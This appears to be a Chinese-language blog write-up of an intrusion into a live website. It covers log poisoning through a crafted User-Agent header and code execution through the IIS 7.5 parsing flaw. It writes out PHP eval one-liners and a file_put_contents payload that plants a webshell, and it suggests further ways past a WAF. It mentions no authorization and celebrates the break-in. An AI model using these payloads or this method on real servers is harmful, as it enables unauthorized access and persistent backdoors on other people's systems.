拿到目标网站 ping 了一下
看到了 gaofangcdn 的字样。。想了一下,还是先从web入手吧。
用御剑扫了一下目录,然后扫到了一个 NewFile.txt 文件,初步以为是前辈遗留的痕迹。继续等到扫描结果。但是扫到最后除了这个newfile.txt 什么都没扫描出来。于是习惯性的打开看看这个文件是什么。
打开以后发现,类似一个日志文件。内容如下。
继续往下看,发现我刚才的访问也在里面。
2017/02/19 21:49:27pm =0000000000= mozilla/5.0 (windows nt 10.0; wow64; rv:47.0) gecko/20100101 firefox/47.0 == http://www.zhangweijian.com/
2017/02/19 21:49:30pm =0000000000= mozilla/5.0 (linux; android 4.4.4; huawei sc-ul10 build/huaweisc-ul10) applewebkit/537.36 (khtml, like gecko) version/4.0 chrome/33.0.0.0 mobile safari/537.36; huawei-huawei sc-ul10__sinanews__6.0.2__android__4.4.4 ==
鉴于IIS是7.5. 于是乎,一个邪恶想法产生了。修改 http refer , 加入恶意代码。以 newfile.txt/f.php 的形式执行php代码。 嗯嗯,感觉上来了。
在web里新建了一个页面加入 <a href="目标站">aaaa</a> 超链接,访问页面a.html?<php eval($_post[cmd]);?> ,然后点击链接。加载完成后,访问 newfile.txt 看看有没有被记录进去。
如图所示,
访问成功被记录并写入newfile.txt里了。但是字符却被编码了。这样肯定是没法执行的啊。用火狐修改refer看一下吧。
在火狐里修改来路
执行。 然后在访问一下看看有没有被成功写入。
如图所示,
又被编码了。再看一下文件内容,不是还有 user-agent 吗? 好吧,那就利用user-agent来试一下吧。
用谷歌浏览器的插件,修改 user-agent 内容。
然后再访问一下目标网站主页。
然后我们再来看一下newfile.txt文件内容,
如图所示,代码已经成功写入。
再写入一个 phpinfo ,
,也成功写入。
好了,用 iis7.5 的解析漏洞,来执行代码看一下。
代码执行成功。。。 但是用菜刀连接的时候,一直连接不上。。。初步怀疑是文件太大的问题。于是打算用代码写个一句话到网站目录。
修改 user-agent 为 ,<?php file_put_contents(dirname(__FILE__).'/ipt.php','<?php eval($_post[cmd]);?>');?> 然后访问网站。
发现代码已被写入。然后 执行代码。
访问 shell 也已经写成功了。
但是,,,菜刀就是无法连接。 单独post 执行 phpinfo(); 也无果。。猜测可能服务器有比较强大的 WAF。。。
也可以继续用修改 user-agent 的方法制造远程包含来过 Waf 之类,后续的暂时没有测试了。
至此为止,也便有了此次奇葩的 拿 shell 之旅。。。
忍不住吟诗一首
至于奇葩不奇葩,
真是没法说它,
谁知道根目录就有个记录日志的newfile ,
修改http头,
由得我胡乱写入呀,
iis7.5解析正好来执行它,
哈哈哈,
哈哈哈,
你说奇葩不奇葩。。。
|